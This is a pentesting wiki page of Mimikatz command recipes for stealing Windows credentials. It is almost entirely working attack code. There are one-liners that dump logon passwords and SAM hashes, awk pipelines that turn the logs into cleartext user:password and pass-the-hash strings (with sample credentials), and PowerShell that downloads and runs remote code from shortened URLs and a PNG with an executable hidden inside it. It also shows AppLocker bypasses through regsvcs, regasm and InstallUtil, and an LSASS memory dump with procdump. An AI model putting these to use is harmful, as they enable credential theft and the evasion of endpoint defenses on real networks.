MimiKatz

From BHaFSec Pentesting Notes Wiki

One-liner that dumps logon passwords and the local SAM hashes to mimikatz.log (a bare "log" with no file name writes to mimikatz.log in the current directory; token::elevate gives the SYSTEM token that lsadump::sam needs to read the SAM):

mimikatz.exe log "privilege::debug" "sekurlsa::logonPasswords"  "token::elevate" "lsadump::sam" exit


List all usernames with domains and passwords from mimikatz.log, as DOMAIN\user:password (run from the directory holding the log files; the tr strips tabs and carriage returns so the awk field numbers line up, and the grep drops the LM/NTLM lines, Microsoft_OC1 (Lync/Skype cached entries) and empty "(null)" passwords):

cat *|tr -d '\011\015' |awk '/Username/ { user=$0; getline; domain=$0; getline; print user " " domain " " $0}'|grep -v "* LM\|* NTLM\|Microsoft_OC1\|* Password : (null)"|awk '{if (length($12)>2) print $8 "\\" $4 ":" $12}'|sort -u

ACME\john.smith:Myl0ngP@ssword
jira.acme.com\john.smith@acme.com:Myj1raP@ssword

Same list without the domain, as user:password:

cat *|tr -d '\011\015' |awk '/Username/ { user=$0; getline; getline; print user " " $0}'|grep -v "* LM\|* NTLM\|Microsoft_OC1\|* Password : (null)"|awk '{if (length($8)>2) print $4 ":" $8}'|sort -u

john.smith:Myl0ngP@ssword
john.smith@acme.com:Myj1raP@ssword

List all usernames and NTLM hashes as DOMAIN/user%LM:NTLM, ready for pass-the-hash tools (pth-winexe and friends); aad3b435b51404eeaad3b435b51404ee is the empty LM hash, since modern hosts do not store LM:

cat *|tr -d '\011\015' |awk '/Username/ { user=$0; getline; domain=$0; getline; print user " " domain " " $0}'|grep -v "* LM\|* Password\|Microsoft_OC1"|awk '{if (length($12)>2) print $8 "/" $4 "%aad3b435b51404eeaad3b435b51404ee:" $12}'|sort -u

ACME/john.smith%aad3b435b51404eeaad3b435b51404ee:1acd1a77416c50969d66867cd1e27e91


Loading Mimikatz entirely in memory (PowerSploit's Invoke-Mimikatz pulled over HTTP via a URL shortener; an is.gd link resolves to whatever it currently points at, so check the target before running this on a client network):

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

Mimikatz AppLocker whitelist bypass via regsvcs.exe / regasm.exe (.NET 2.x)

You need admin rights. First, in PowerShell, paste the following to write the strong-name key file key.snk (the -Encoding Byte form is Windows PowerShell; PowerShell 7 uses -AsByteStream instead):

$key = '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'
$Content = [System.Convert]::FromBase64String($key)
Set-Content $env:TEMP\key.snk -Value $Content -Encoding Byte

Then run this one-liner from a cmd prompt: it fetches the katz.cs source, compiles it with the .NET 2.x csc.exe signed with key.snk, and has regsvcs.exe and regasm.exe (both Microsoft-signed, so allowed by default AppLocker rules) load the assembly, whose registration hook runs mimikatz with the given commands:

powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('http://is.gd/iNnAge','%temp%\katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v2.* && csc.exe /r:System.EnterpriseServices.dll /out:%temp%\katz.exe /keyfile:%temp%\key.snk /unsafe %temp%\katz.cs && regsvcs.exe %temp%\katz.exe && regasm.exe %temp%\katz.exe log privilege::debug sekurlsa::logonpasswords


Mimikatz from a base64 encoded .png file

  • You need to be admin. From a cmd prompt, start powershell and paste the following lines; the executable is stored base64-encoded after the PNG image data, which for this particular file starts at byte offset 9343:
powershell
$url = 'https://2.bp.blogspot.com/-7I8duTC1gCo/VfDuQ_Ax-kI/AAAAAAAAAT8/03qXhXigYRw/s1600/skullkatz.png'
$request = New-Object System.Net.WebClient
$bytes = $request.DownloadData($url)
$b64 = [System.Text.Encoding]::ASCII.GetString($bytes, 9343, $bytes.Length - 9343)
$realdeal = [System.Convert]::FromBase64String($b64);
[io.file]::WriteAllBytes('c:\windows\temp\skull.exe',$realdeal)
exit
c:\windows\temp\skull.exe log privilege::debug sekurlsa::logonpasswords

Or use this one-liner, which compiles a .NET 4.x installer class and has InstallUtil.exe /U run its uninstall hook; mimikatz then reads commands interactively, so type the two commands below at its prompt:

powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('http://is.gd/ra66Ok','skullkatz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:skullkatz.exe skullkatz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U skullkatz.exe 
privilege::debug 
sekurlsa::logonpasswords


Execution-policy bypass with a local copy of Invoke-Mimikatz.ps1 (dot-source the script, then call the function)

powershell -noprofile -executionpolicy bypass -command "&{. .\Invoke-Mimikatz.ps1;Invoke-Mimikatz}"


Grab Passwords from LSASS Memory Dump

Dump the process with Sysinternals procdump (-ma writes a full memory dump):

procdump -accepteula -ma lsass.exe lsass.dmp

Transfer the dump back to the attacking machine and load it into mimikatz. Use the mimikatz build that matches the target's architecture (x64 mimikatz for a dump from an x64 host), otherwise the minidump will not parse.

mimikatz # sekurlsa::minidump e:\lsass.dmp
Switch to MINIDUMP : 'e:\lsass.dmp'
mimikatz # sekurlsa::logonPasswords